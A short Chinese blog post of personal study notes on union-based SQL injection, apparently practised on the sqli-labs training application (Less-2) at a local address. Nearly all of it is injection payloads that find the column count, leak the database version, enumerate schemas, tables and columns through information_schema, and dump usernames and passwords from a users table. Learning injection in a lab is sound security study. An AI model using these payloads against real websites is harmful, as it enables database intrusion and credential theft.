SQL注入1.0

id title content time author
select * from new where id=1?
select 联合查询 union
order by 排序 先知道有几列 在联合查询
version 版本号
前后两个语句都对就显示ID了,把不要查的报错后面的版本信息就出来了id=-1 union select 1,2 ,version()
查询数据库中所有的库名
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata 所有的库名


http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' 表名

 

schemate 保存所有数据库的名字 tables 保存所有的表的名字 column 保存所有的字段的名字

id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' 列名
schemata
库名.表名

 

union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata
、、查询所有的表


union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()


查询当前库中某一个表的所有列 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'

group_concat schema.schemata SCHEMA_NAME

查字段的内容union select 1,group_concat(username),group_concat(password) from security.users 或者 union select 1,2,group_concat(username, '-',password) from users


查询所有的咧 select column_name from

posted @ 2018-04-19 08:24  snake冰淇凌  阅读(264)  评论(0编辑  收藏  举报